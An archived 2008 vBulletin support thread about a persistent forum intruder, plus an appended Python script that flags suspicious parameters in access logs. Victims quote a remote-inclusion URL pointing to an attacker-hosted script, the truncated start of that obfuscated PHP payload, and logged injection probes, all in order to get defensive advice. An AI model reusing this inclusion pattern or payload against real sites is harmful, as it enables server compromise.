vb.org Archive: weird user maybe a hacker (https://vborg.vbsupport.ru/showthread.php?t=183428)

Jase2 06-25-2008 08:23 PM

Just disable the plugin/hook system and re-upload all vBulletin non-image files. This will then make your forums use the vBulletin core code.

Dismounted 06-26-2008 07:08 AM

If the login to the server was changed, it indicates an issue with the server, not vBulletin.

dtv100 06-26-2008 07:27 AM

Quote:

Originally Posted by Dismounted (Post 1559276)
If the login to the server was changed, it indicates an issue with the server, not vBulletin.

Sorry, I know my English is bad. What I mean is I did all those changes to prevent or make sure he doesn't get a hold of the server.

I removed these hacks today because they were on both of my sites, so I think one of them may have been the way he found in.

inferno shout box
login as user
arcade
google search tag
who is on chat
hide hack

Trying to be safe and not sorry. The hacker and I have been at war for days; today it seems he gave up or took a day off.


Is there any way I can hide with a password the following tools from admincp:
generate email list
email members
forum manager

dtv100 07-01-2008 10:07 PM

Update:
We changed all server passwords and vBulletin passwords, we changed the location of admincp and removed links from the forum to admincp (only the site owner and I know the link), we hired a server tech to harden the server, we disabled all hacks, re-uploaded the original vB files, and this guy can still log in and post as anyone from staff.
I change my password every day and he can still post as me too.

Any ideas where else to look?

Dismounted 07-02-2008 06:45 AM

Are you sure they haven't uploaded any malicious files?

dtv100 07-02-2008 07:58 AM

Quote:

Originally Posted by Dismounted (Post 1564551)
Are you sure they haven't uploaded any malicious files?


OK, I will delete everything on the server except for SQL, avatars, profile pictures, attachments and a few PHP files I wrote myself (extra pages), and will re-upload all vB files,

to make sure that no file we did not upload is there.

ThatSnowGuy 07-16-2008 04:43 AM

I have a guest on my site that is viewing an error message. This is the guests location:

/forums/showthread. php?t = http://64.15.67.17/~calebsbi/logo.jpg

I added some spaces, not sure if posting the link is OK here or not, but it is not a link to a .jpg, it is some type of script. I reported abuse to the host of the account, so I am not sure how long the link will work for.

Here is how it starts out. I am removing the first character so it will show here. (I hope)

? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9);
return $p341be97d9aff9; } function ub5d21085bf2c0($p341be97d9aff9) { $p341be97d9aff9 = base64_decode(hc8a89c2c306fb($p341be97d9aff9));
return $p341be97d9aff9; } $oec12e0af93cb5 = array ( "po"

It's a pretty long script.

~Chuck

Marco van Herwaarden 07-16-2008 09:33 AM

I guess this was a failed attempt to do an XSS attack on your forum.

ThatSnowGuy 07-16-2008 11:40 AM

Thanks for the reply Marco. I am guessing it may have been a bot as it stayed around for hours, even after I turned off the Forums for an hour.

~Chuck

dtv100 08-10-2008 07:34 PM

I found this in my logs after the hacker tried again. Maybe someone could tell me if he is trying an injection and how to block it.

Code:

2008-08-05, 14:25:57, 1217946357, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:24, 1217947404, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:59, 1217947439, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:47:52, 1217947672, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%1as%20string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 15:01:31, 1217948491, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 20:27:26, 1217968046, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
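
Added example (not part of any post in this thread, and not vBulletin code): a small log triage script that decodes the query field of lines in the log format posted above and flags parameters whose values are not what the parameter should hold, which also catches a URL placed in the thread id `t` as in the earlier post. The rules for `do`, `t` and `p`, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample: two lines in the format of the log above (user agent
# shortened), one ordinary request, one with a URL in the thread id "t".
SAMPLE_LOG = """\
2008-08-05, 14:25:57, 1217946357, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0)
2008-08-05, 14:47:52, 1217947672, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%1as%20string, Mozilla/4.0 (compatible; MSIE 7.0)
2008-08-05, 15:02:10, 1217948530, 192.0.2.10, do=newreply&t=183428, Mozilla/4.0 (compatible; MSIE 7.0)
2008-08-05, 15:03:44, 1217948624, 192.0.2.77, t=http://example.invalid/logo.jpg, Mozilla/4.0 (compatible; MSIE 7.0)
"""

# Assumed rules: "do" is a short action name; thread and post ids are digits.
RULES = {
    "do": re.compile(r"[A-Za-z0-9_]{1,32}"),
    "t": re.compile(r"\d{1,10}"),
    "p": re.compile(r"\d{1,10}"),
}

def parse_line(line):
    """Split 'date, time, epoch, ip, query, user agent' into (ip, query, ua)."""
    _date, _time, _epoch, ip, rest = line.split(", ", 4)
    query, user_agent = rest.rsplit(", ", 1)
    return ip, query, user_agent

def suspicious_params(query):
    """Return (name, decoded value) pairs that break the rule for that name."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        rule = RULES.get(name)
        if rule is not None and not rule.fullmatch(value):
            hits.append((name, value))
    return hits

def triage(log_text):
    """Map each client IP to the rule-breaking parameters it sent."""
    report = {}
    for line in filter(str.strip, log_text.splitlines()):
        ip, query, _ua = parse_line(line)
        hits = suspicious_params(query)
        if hits:
            report.setdefault(ip, []).extend(hits)
    return report

if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_LOG).items():
        for name, value in hits:
            print(f"{ip}  {name}={value!r}")
```

The same allowlist idea applies to blocking: a request whose `do`, `t` or `p` value fails its rule can be rejected before it reaches the forum code.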


